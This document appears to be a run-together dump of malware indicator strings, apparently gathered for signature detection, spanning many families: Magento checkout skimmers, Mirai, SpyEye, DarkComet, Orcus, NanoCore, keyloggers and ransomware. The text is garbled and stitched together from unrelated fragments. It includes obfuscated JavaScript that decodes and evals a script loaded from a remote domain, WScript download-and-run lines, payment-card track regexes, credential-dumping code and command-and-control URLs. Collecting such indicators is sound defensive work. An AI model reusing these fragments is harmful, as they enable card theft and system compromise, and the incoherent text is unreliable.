\".basename(\"/usr/bin/hostmagentopatchupdate.com'base'.(128/2).'_de'.'code'echo(\"FILE_Bad\");\\x6F\\x6E\\x65\\x70\\x61\\x67\\x65\\x7C\\x63\\x68\\x65\\x63\\x6B\\x6F\\x75\\x745e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117t_p#0.qlb#0.#1Blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0\\x2F\\x6D\\x65\\x64\\x69\\x61\\x2F\\x63\\x61\\x74\\x61\\x6C\\x6F\\x67\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x2F\\x63\\x61\\x63\\x68\\x65\\x2F\\x31\\x2F\\x74\\x68\\x75\\x6D\\x62\\x6E\\x61\\x69\\x6C\\x2F\\x37\\x30\\x30\\x78\\x2F\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2F\\x42\\x2F\\x57\\x2F\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2E\\x70\\x68\\x70\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;var grelos_vinfopromo.bizjquery-code.sujquery-css.sumegalith-games.comcdn-cloud.pwanimalzz921.pwstatsdot.eu\\x6D\\x61\\x67\\x65\\x2D\\x63\\x64\\x6E\\x2E\\x6C\\x69\\x6E\\x6BRegExp(\"[0-9]{13,16}\")105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101=oQKpkyJ8dCK0lGbwNnLn42bpRXYj9GbENDft12bkBjM8V2Ypx2c8Rnbl52bw12bDlkUVVGZvNWZkZ0M85WavpGfsJXd8R1UPB1NywXZtFmb0N3boxz=x['length'];for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)-10) }w=this['unescape'](y);this['eval'](w);this['eval'](this['atob']('tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?onepage|checkout|onestep|firecheckout|onestepcheckout'one|check'|RegExp|onepage|checkout|grelos_v= null\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065\\x73\\x63\\x72\\x69\\x70\\x74\\x22www.fopo.com.ar\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145<input type='submit' name='upload' value='upload'>if($_POST['upload'])php_uname()lastc0de@Outlook.comCodersLeetAgencyCaFcKapaljetz666X-PHP-ScriptX-PHP-Originating-Script/usr/bin/php.jseW[ZZQW@41g.1p4\@@D;%:
\{g`.41g.1p
Uwwqd`.4>;>
W{z`qz`9@mdq.4`ql`;|`yx
Df{lm9W{zzqw`}{z.4_qqd9Ux}bq
W{z`qz`9xqzs`|.4$
HDllCanLoadNowPxxWuzX{upZ{cZayvqf4{r4gav
qmg.41pJXNcc2hlbGxcb3Blblxjb21tYW5k^LZww&|xvSlwv'Vxvxl~v&%`MC!
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==GQRGFRpVA
BwFQB@E%^^ARF^@$!wA'xnpSB`LQZxvzFmMClEwy-~NLZnv'^wYU))C:\\Users\\why\\W.HAgqfgHc|mHg:\\ykcx\\s.Hm
wlH(miansha)<y}uzg|u=server(\xE5\xA3\xB3)|.H&$%':%%:&!Hgqfbqf<
=HFqxqugqHgqfbqf:dpv
MiniAsp3\\Release\\MiniAsp.pdbhttp://%s/about.htmhttp://%s/result_%s.htmopen internet failed
run error!time out,change to mode 0Myname--is:busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROPbusybox iptables -A INPUT -p tcp --destination-port 5555 -j DROP/proc/net/tcp/dev/watchdog/dev/misc/watchdogPMMVFGDCWNVOMVJGPZOJFKRAssl3_ctrl210765qllw;;;;;;GET /mirai/dvrHelperTran Duy LinhDLC Corporationdw20.exeL
StubPath
http://142.91.76.134/p.datHttpDump 1.1S
http://extcitrix.we11point.com/vpn/index.php?ref=1%SystemRoot%\\System32\\svchost.exe -k msupdateManagement Support Team1DTOPTOOLZ Co.,Ltd.0SEOUL1Hello World!CONIN$SetConsoleModeGetEnvironmentStringsGetFileTypeHeapCreateVirtualFreeGetOEMCPFlushFileBuffersSetStdHandleextension: .jpgyahoo kec\\Control\\zxplughttp://www.facebook.com/comment/update.exeShared a shell to %s:%s Successfullyapplication/x-ms-applicationapplication/x-ms-xbapapplication/vnd.ms-xpsdocumentapplication/xaml+xmlapplication/x-shockwave-flashimage/pjpegSet return time error =   %d!Set return time   success!Quit success!msn.klmwmsn.klmbms.klmError %u while loading TSU.DLL %lsGetModuleFileName() failed => %uT
220 LightFTP server v1.0 ready*
PASS->logon successful250 Requested file action okay, completed.m
ProcessHackerF
m?Dm?SFILTERNONECANCELSMSDIVERTMESSnofilter1111111+380678409210_SHUTDOWNEVT_VNCEVT_BACKIE_Hook::GetRequestInfoFF_Hook::getRequestInfoEX_Hook::CreateProcesshijackdll.dllMTX_FF::PR_WriteHook entryFF::PR_WriteHook exitHijackProcessAttach::*** MASTER *** MASTER *** MASTER *** %s PID=%uHijackProcessAttach::entryFF::BEFORE INJECTFF::AFTER INJECTIE::AFTER INJECTIE::BEFORE INJECT*** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** %s*** LOG INJECTS *** %s*** inject to process %s not allowed*** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** %s.?AVFF_Hook@@.?AVIE_Hook@@Inject::InjectDllFromMemoryBadSocks.dllextensadv.cctopbeat.ccbrainsphere.cccommonworldme.ccgigacat.ccnw-serv.ccparagua-analyst.ccSpyEye%BOTNAME%globpluginsdata_injectdata_beforedata_afterdata_endbot_versionbot_guidTakeBotGuidTakeGateToCollector[ERROR] : Omfg! Process is still active? Lets kill that mazafaka![ERROR] : Update is not successfull for some reason[ERROR] : dwErr == %uGRABBED DATAwebfakes.dllconfig.datcollectors.txtwebinjects.txtscreenshots.txtbillinghammer.dllblock.dllbugreport.dllccgrabber.dllconnector2.dllcreditgrab.dllcustomconnector.dllffcertgrabber.dllftpbc.dllrdp.dllrt_2_4.dllsocks5.dllspySpread.dllw2chek4_4.dllw2chek4_6.dllE!V
LCallTogether, Inc.QTI International Inc.
win 8.1win Server 2012 R2win Srv 2012win srv 2008 R2win vstawin srv 2003 R2win hm srvwin Strg srv 2003win XP prof x64 edtwin 2000D:\\Acms\\2\\docs\\Visual Studio 2013\\Projects\\DownloadExcute\\DownloadExcute\\Release\\DownExecute.pdbd:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\writer.h:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\internal/stack.h<Win Get Version Info Name ErrorP@$sw0rd$nd$t@k0v2rF10w|
Download ExcuteEncryptorFunctionPointer %d%s\\%s.lnkMac:%s-Cpu:%s-HD:%sfeed back responce of hostGET Token at hostdwn md5 err\
Can't get the Windows version=M=Q=U=Y=]=a=e=i=m=q=u=y=}=J
%s, ProgID:claveShell_TrayWndmelt.bat\\StubPath\\logs.dat1027|Operation has been canceled!466|You need to plug-in! Double click to install... |33|[Keylogger Not Activated!]TVpTAQEAAAAEAAAA//8AALgAAAATVoAAAAAAAAAAAAAAAAAAAAAAAATVqAAAEAAAAEABAAAAAAAAAAAAATVpQAAIAAAAEAA8A//8AALgAAAAC
exe.tsohcvsexe.ssaslexe.rerolpxeexe.erolpxeiexe.23lldnurexe.dmcexe.llikksatlld.23lenreKlld.ESABLENREKlld.esabtpyrclld.trcvsmLLD.LLDTNpaeHssecorPteGsserddAcorPteGAyrarbiLdaoLteSlortnoCtnerruCnuR\\noisreVtnerruC\\23metsys\\\\23metsyS\\niB.elcyceR$%tooRmetsyS%A
[mimikittenz.MemProcInspector]PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[DllImport(\"kernel32.dll\", SetLastError = true)]3AESVERSONEX12CUpdateGates11CUpdateBillZN8CUtility7DeCryptEPciPKciZN13CThreadAttack5StartEP11CCmdMessageMr.BlackVERS0NEX:%s|%d|%d|%sPRIVMSG %s :[STD]Hitting %sNOTICE %s :TSUNAMI <target> <secs>NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
/tag=info&id=15\\Temp\\iExplorer.exe\\Temp\\\"TSG\"greensky27.vicp.net\
otna.vicp.netsmithking19.gicp.netUser-Agent: webclient\\User.iniUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200\
Connection:Keep-Alive: %dReferer: http://%s:%d/%
password <=14/%ldn.txtKill You\x00D
\x00NetPass Update\x00\x00%s:DOWNLOAD\x00\x00%s:UPDATE\x00\x00%s:uNINSTALL\x00?InjectDll@@YAHPAUHWND__@@K@Z?UnmapDll@@YAHXZ?g_bSubclassed@@3HAaCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnTad6af8bd5835d19cc7fdc4c62fdf02a1%s?cstorage=shell&comp=%s75BAA77C842BE168B0F66C42C7885997B523F63566F407F3834BCC54AAA32524SVWf
\\MicNS\\NSFreeDll
01+x(*7?*95x;9667getapula.pdbwtsapi32.dllcmpbk32.dllPostMessageAPeekMessageWDispatchMessageWWTSEnumerateSessionsA
\\\\/Applications/Automator.app/Contents/MacOS/DockLightioreg -l | grep \"IOPlatformSerialNumber\" | awk -F+:Users:Shared:UserEvent.app:Contents:MacOS:rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'osascript -e 'tell application \"System Events\" to get the hidden of every login item'osascript -e 'tell application \"System Events\" to get the name of every login item'osascript -e 'tell application \"System Events\" to get the path of every login item'serverVisible \x00.aspack.adataASPack.ASPack.ccgBitArtsDAStub!EPackFSG!kkrunchy.mackt.MaskPEMEW.MPRESS1.MPRESS2.neolite.nsp1.nsp2.nsp0.packedpebundlePEBundlePEC2TOPECompact2pec1pec2PEC2MOPELOCKnt.perplexPESHiELD.petiteProCrypt.RLPackRCryptor.RPCrypt.sforce3.spack.svkpThemida.Themida.Upack.ByDwingUPX0UPX1UPX2.UPX0.UPX1.UPX2.vmp0.vmp1.vmp2VProtectWinLicenWWPACK.yP.y0daMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.; SV1)trj:HTML Err.trj:workFunc start.trj:cmd time out.trj:Thread time out.trj:Create PT done.trj:Create PT error: mutex already exists.Create Pippe Failed!Transfering Fileput Paras Error:Cmd Time Out..Cmd has been killed.H
?<ssylkaustanavlivatpoluchitpereslatderzhatvykhoditNachaloH
z{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0POST %s HTTP/1.0Accept-Encoding: identity, *;q=0kE
_deamon_initpyi-windows-manifest-filenames061779s061750[OnUpLoadFile][OnDownLoadFile][FileTransfer]---- Not connect the Manager, so start UnInstall ----------- Enter CompressDownLoadDir ---------------- Enter DownLoadDirectory ---------[HandleAdditionalData][mswsocket.dll]msupdate.dll........Enter ThreadCmd!ok1-1msupdate_tmp.dllreplace Rpcss.dll successfully!f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb\\drivercashe\\\\microsoft\\windwos\\\\DosDevices\\LOADHIDDENDRIVER\\Device\\LOADHIDDENDRIVERGlobal\\state_mapingE:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdbGlobal\\unInstall_event_1554_Ower
PAllowIdentity ProtectionAllow for allAVG Firewall Asks For Confirmation0x1A7B4C9F5061636b61676500000000000000000000000000000000000000000000000000000000000000000000000000000000{\\stylesheet{ Normal;}{\\s1 heading 1;}{\\s2 heading 2;}}9E
wsprintfA
seed\x00prot\x00ownin\x00feed0\x00nown\x00sinkholedynadotmalwtrojanabusespamBOOTKIT_DLL.dll
6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr/safe/record.php_Rm.battry\x0d\x0a\x09\x09\x09\x09  del %sExt.orgAppData\\Local\\Temp\\MicroMedia\\MediaCenter.exe\\Projects\\C#\\Sayad\\Source\\Binder\\obj\\Debug\\Binder.pdbDelphiNative.dllsqlite3.dllb
\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdbC
9887___skej3sdhaha123
Enterprise Mailing ServiceBlacklisted by rule: %s:%s/SuccessMails?CampaignNum=%ld/TimedOutMails?CampaignNum=%ld/InvalidMails?CampaignNum=%ldFailed to download maillist, retryingNo maillist loadedSuccessfully sent using SMTP account %s (%d of %ld messages to %s)Successfully sent %d of %ld messages to %sSending to %s in the same connectionNew connection required, will send to %sMail transaction for %s is over.Domain %s is bad (found in cache)Domain %s found in cacheDomain %s isn't found in cache, resolving itAll tries to resolve %s failed.Failed to receive response for %s from DNS serverGot DNS server response: domain %s is badGot error %d in response for %s from DNS serverMX's IP for domain %s found in cache:Timeout waiting for domain %s to be resolvedNo valid MXes for domain %s. Marking it as badResolving MX %s using existing connection to DNS serverAll tries to resolve MX for %s are failedResolving MX %s using DNS serverFailed to receive response for MX %s from DNS servert
mkdir %s%s > nul 2>&1p[%s%s%d.%s
lwizvmFEJIKCINZQNDI
DKFKCK
\\amd64\\elrawdsk.pdbR
c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdbl
SetSystemTimeAdjustment\\payload\\payload.x86.pdbU
PPSWVPPWinSCard.dll/
Esamsrv.dllHookDC.dllCDLocateCSystemSamIRetrievePrimaryCredentialsSamIRetrieveMultiplePrimaryCredentials3
WV5u15V
SQLite format 3
*[S-P-L-I-T]**[H-E-R-E]*FTP~~1~1~0~0n
\x00Remote.dll\x00\x00CGm_PlugBase::\x00ServiceMain\x00_K_H_K_UH\x00\
\x00x86_GmRemote.dll\x00\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00\x00GmShutPoint\x00\x00GmRecvPoint\x00\x00GmInitPoint\x00\x00GmVerPoint\x00\x00GmNumPoint\x00_
\x00soul\x00\x00InstallDll.dll\x00\x00_One.dll\x00_Fra.dllCrtRunTime.logProd.tProe.tBurn\\LiveUpdata_Mem\\
_tmpR.vbs_tmpg.vbsDtl.dat3C6FB3CA-69B1-454f-8B2F-BD157762810EEED5CA6C-9958-4611-B7A7-1238F2E1B17E8A8FF8AD-D1DE-4cef-B87C-82627677662E43EE34A9-9063-4d2c-AACD-F5C62B849089A8859547-C62D-4e8b-A82D-BE1479C684C9A59CF429-D0DD-4207-88A1-04090680F714utd_CE31f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdbl:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdbf:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdbE:\\VS2010\\xPlat2\\Release\\InstRes32.pdb%s%s.exe_log.txtOpenFileMappingNtCreateUserProcessNtQueryDirectoryFileRtlCreateUserThreadDeleteUrlCacheEntryPR_ReadBEGIN PUBLIC KEYP
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)?sessd=&sessc=&sessk=3a08fe7b8c4da6ed09f21c3ef97efce2_ZN11CThreadPool10getBatchesERSt6vectorISt4pairISsiESaIS2_EE_ZNSs4_Rep10_M_destroyERKSaIcE@@GLIBCXX_3.4_ZNSt6vectorImSaImEE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPmS1_EERKm_ZNSt6vectorISt4pairISsiESaIS1_EE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPS1_S3_EERKS1__ZSt20__throw_out_of_rangePKc@@GLIBCXX_3.4pages.touchpadz.combat.touchpadz.comstat.touchpadz.comsk2.touchpadz.comtreasureHunter.pdbjucheckcmdLineDecryptedbarcodmsports.dllnddeapi.dllglmf32.dll<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">cmutil.dllmprapi.dllskype.datskype.iniCreateWindowYIWEFHIWQCreateDesktopMyDesktop
RZIDI_ICON5starter.exewmifw.exeSoftware\\rartmp092.tmptemp1.exeViotto Keyloggermsvbvm60FtpPutFileAVBA6C:\marijuana.txtsIRC4
_/2011/n325423.shtml?wyle\\~ISUN32.EXEI0$9
\x00ScriptManC:\\WINDOWS\\system32\\sysprep\\cryptbase.dllProbeScriptFintProbeScriptKids/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"SysScan DEBUG Mode!!!This rechecking? (set 0/1 or press enter key)http://37.49.224.144:8189/manual_resultChecker end work!Trying send result...BB2FA36AAA9541F0md5=denyip=rmfile=exec_packetbuild_iphdr
/bbs/info.asp\\msinfo.exe%s\\%srcs.pdf\\aumLib.ini9/f30Li5ubO5DNADDxG8s762tqY=
"QBome
X_ID: X_OS: X_BV: InitializeSecurityDescriptorMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)Usage: -[start|stop|install|uninstall\\SYSTEM32\\sc.exe config LanmanWorkstationmcfmisvclsremoraservpwfgdumpfgexecfgexecpipeosql\\srcOSQLUSEROSQLPASSWORDOSQLSERVERcmd /c net start %s%ADD%KARTOXAa
REGEXENDRegExprregex[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*([0-9]{15,16}[D=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})((b|B)[0-9]{13,19}\\^[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})[0-9]*\\^[a-zA-Z]*/[a-zA-Z ]*\\^[0-9]*\\d{15,19}=\\d{13,}\\;?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*Data.txtTrack1Track2T1_FOUND: %sid=%s&log=%sGET /sets.txtAUTH LOGINReply-ToX-Mailert
fgdump\\pstgdumpchgxp.vbsofficekey.exefindkey.exexpkey.exeDiabloHornProcess Memory Dumperpid-%s.dmpPid %d in not acessiblememdump.exe%s-%d.dmpblazingtools.comK
SearchInjectinject base:Searcher.dlldmpz.log/api/process.php?xy=User-Agent: PCICompliant%s:*:Enabled:%starget pid:scan all processes:<pid> <PATTERN>\\svhst%pceh_3\\.\\ceh_4\\..\\ceh_6Yatoed3fe3rex23030am39497403Poo7lo276670173quai16568unto1828Oleo9eds96006nosysump7hove19CommonFile.exeCallImage.exeBurpSwimWork\\Project\\LoadWortHisnalftp -s:%s\\system32\\winxml.dlltor -f <torrc>tor_umemscanCHEWBAC3
OPSEC_BERNHARDC:\\bernhard\\Debug\\bernhard.pdbU
]\\AppData\\Roaming\\lsacs.exeupdateinterval=cardinterval={[!17!]}{[!18!]}uniqyeidclaxemainhttp://%s/cdosys.php\\The Hook\\Release\\The Hook.pdb\\\\.\\mailslot\\LogCCGET /%s?encoding=%c&t=%c&cc=%I64d&process=d
z:\\Slender\\mozart\\mozart\\Release\\mozart.pdbgarbage.tmp
NCR SelfServ Platform Remote MonitorNCR_RemoteMonitor
Pe1WXCFvYbHo5C
RYG@JAY]R
RYG@@Z
R\KMWMBK\R
R]W]ZKCp?R
RLAAZR
R\KMAXK\WR
R*\KMWMBK LG@R
R^K\HBAI]R
RMA@HGI C]GR
R^\AI\Op?R
R^\AI\Op<R
RIAAIBKR
RZKC^R
RH:LMp?R
ROBB[]Kp?R
R^\AI\Op<R
RO^^JOZOR
R^\AI\Op=R
R^[LBGMRhttp://tuginsaat.com/wp-content/themes/twentythirteen/stats.phpr
seven_legion@india.comFOR DECRYPT FILES
SEND @%s._%02i-%02i-%02i-%02i-%02i-%02i_$%s$.777R
won't be able to recover your files anymore.</p>j
Please restart your computer and wait for instructions for decrypting your files kscdSRomantic9%9R9f9q9I
  </trustInfo>L
:n;t;y;        <requestedExecutionLevel level2
  <trustInfo xmlnssrtWd@@515]5z5C
    <security>    </security>V
      </requestedPrivileges>last.infF
3,31363H3P3m3u3z3</svg>location.href='httpRNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkeme132.DLLklospad.pdbABCXYZ11!DMALOCK!DMALOCK3.0!DMALOCK4.0fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')var shell = new ActiveXObject('WScript.Shell');shell.run(t'ZoomIt - Sysinternals: www.sysinternals.comM
Software\Locky
<description>WinRAR SFX module</description>B
<!--The ID below indicates application support for Windows 10 -->X
tgwyugwqSwvwnguEnumLocalResWNetOpenEnumW
!SATANA!%s-TryExceptd:\lbetwmwy\uijeuqplfwub.pdbqfntvthbNow it's %I:%M%p.
val is %d
n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<t;<<t;<<t<<<t<<>>><<<c/a/a/b/a/main/Start.classcon g/con g.perljava/textito.isnMain.classPKplugins/Server.classPKIDPKconfig.iniPKpassword.iniPKLoadStub.classPKLoadStubDecrypted.classPKLoadPassword.classPKDecryptStub.classPKClassLoaders.classPKutil/OSHelperAlienSpyconfig.xmlPKkey.classPKsvd$1.classPKsvd$2.classPKMensaje.classPKinic$ShutdownHook.classUninstall.jarPKresources/icono.pngPKbss_serverCLICK_DELAY
SCK_IDmodInjPEB
f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439txtChatUDPFloodBolonyoktedonadoninyse.comNYSEArca_Listing_Fees.pdfbf13-5d45cb40Backup.zipupdates.txtvdirs.datdefault.datmime.datFtpUrlScreenCaptureCaptureMouseI
(Online Banking)|(Online banking)(e-banking)|(e-Banking)e
getVerSendCamListuntPluginYpmw1Syv023QZDwZ2plawBmpf3Pb7RJecerberuscom/crimson/PKcom/crimson/bootstrapJar/PKcom/crimson/permaJarMulti/PermaJarReporter$1.classPKcom/crimson/universal/containers/KeyloggerLog.classPKcom/crimson/universal/UploadTransfer.classPK####@####
####@########@####
####@####EditSvrTLoaderStroksXX-XX-XX-XXCG-CG-CG-CG#BEGIN DARKCOMET DATA --#EOF DARKCOMET DATA --DC_MUTEX-#KCMDDC5#-890#KCMDDC51#-890#BOT#URLUpdateCommand successfully executed!M
FastMM Borland Edition%s, ClassID: %sI wasn't able to open the hosts file#BOT#VisitUrlWEBCAMSTOPUnActiveOnlineKeyStrokes#SendTaskMgr#RemoteScreenSizeping 127.0.0.1 -n 4 > NUL &&deflate 1.1.4 Copyright 1995-2002 Jean-loup GaillyGetClipboardDatacapCreateCaptureWindowALsaRetrievePrivateDataResetSSDTWinSta0\\DefaultGh0st
Gh0st Updatesandbox_avg10_vc9_SP1_2011gholeeRichHa 
1$1,141<1D1L1T1\\1d1l1t1<8;$O' @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]jYPQTVTSkllZTTXRTUiHceWda/8.848H8O8i8s8y8w
pwwwwwwwwYYuTVWhDDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuztw
77A779<C<G<M<R<X<9 9-9N9X9s9PostQuitMessagepwlfnn10,gzg_winver7CFC52CD3F87.dllS
havex--></body></head>ANSWERTAG_STARTPATH_BLOCKFILE~
CmdProcessExitedrootDirGetNativeSystemInfo%08x%08x%08x%08xC
KillZoneKillZoneKill[[__M3_F_U_D_M3__]]$M
M3n3gatt1hack3rC
WinHttpGetIEProxyConfigForCurrentUserMETERPRETER_UAGET /123456789 HTTP/1.0C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdbRunPE1082B8C7D3F9105DC66A7E3267C9750CF43E9D325$374e0775-e893-4e72-806c-a8d880a49ae7MonitorinjectionNanoCore.ClientPluginHostIClientNetworkHost#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGeT
1EF0D55861681D4D208EC3070B720C21D885CB35popthatkitty.Resources.resourcesU4tSOtmpM)
Cy4tOtTmpMtTHVFOrRLmddnIkX%s.Identifier%d:%I64u:%s%s;%s%.2d-%.2d-%.4d[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d][Backspace][Tab][Arrow Left][Arrow Up][Arrow Right][Arrow Down][Home][Page Up][Page Down][Break][Print Screen][Scroll Lock][Caps Lock][Alt][Esc][Ctrl+%c]n
DeleteSubKeyget_MachineNameget_UserNameget_LastWriteTimeGetVolumeInformationOSFullNameDownloadDataFM|'|'|nd|'|'|rn|'|'|sc~|'|'|scPK|'|'|CAM|'|'|USB Video Device[endof]rs|'|'|proc|'|'|k|'|'|RG|'|'|~|'|'|kl|'|'|ret|'|'|pl|'|'|lv|'|'|prof|'|'|~|'|'|un|'|'|~[endof]P[endof]Orcus.CommandManagementOrcus.Commands.Orcus.Config.Orcus.Connection.Orcus.Core.Orcus.exeOrcus.Extensions.Orcus.InstallationPromptFormOrcus.MainForm.Orcus.Native.Orcus.Plugins.orcus.plugins.dllOrcus.Properties.Orcus.Protection.Orcus.Share.Orcus.SharedOrcus.StaticCommandsOrcus.Utilities.\\Projects\\Orcus\\Source\\Orcus..orcus.plugins.dll.zip.orcus.shared.dll.zip.orcus.shared.utilities.dll.zip.orcus.staticcommands.dll.zipHvncCommunicationHvncActionhvncDesktopRequestKeyLogCommandget_KeyLogFileLiveKeyloggerCommandORCUS.STATICCOMMANDS, VERSION=PrepareOrcusFileToRemoveConvertFromOrcusValueKindboot.ldrd:\\workplug2.5Plug3.0Shell6GULP
/update?id=%8.8x
DDDD+Proxy-Auth:h
:qTiger324{USER32.DLLlogin.aspcheck.aspresult.aspupload.asp
StubPath
CONNECT %s:%i HTTP/1.0cks=uthj@hadvpackHashtableget_IsDisposedTripleDEStestmemory.FRMMain.resources$
Ap0calypseSifreMsgGosterBaslikDosyalarsInjecsiyonCVu3388fnek3W(3ij3fkp0930diZINGAWI2clWebLightGoldenrodYellowA
$%!aaaaaa1|aaaaaa2|aaaaaa3|aaaaaa4|aaaaaa5|%s%d.exeastalavistagivemecache%s\\system32\\drivers\\blogs\\*bndk13meRandom-Number-Hereconfig.txta/a/a/a/f.classa/a/a/a/l.classa/a/a/b/q.classa/a/a/b/v.classmachinedetailsMySettingssendftppasswordssendbrowserpasswordsarma2keyMasskeylogger
~@1906dark1996coder@SHEmptyRecycleBinAmciSendStringAadd_Shutdownget_SaveMySettingsOnExitget_SpecialDirectoriesClient.MyAvenger by NhTGREAMEH
DecodeProductKeyStartHTTPFloodCodeKeyMESSAGEBOXGetFilezillaPasswordsDataInUDPzSocketsR
A<URL>k__BackingField<RunHidden>k__BackingFieldDownloadAndExecute-
CRYPTPROTECT_PROMPTSTRUCTdiscomouseGetDeepInfoAES_EncryptStartUDPFloodB
kPKstub/stub.dllc.dat
*EDIT_SERVER*
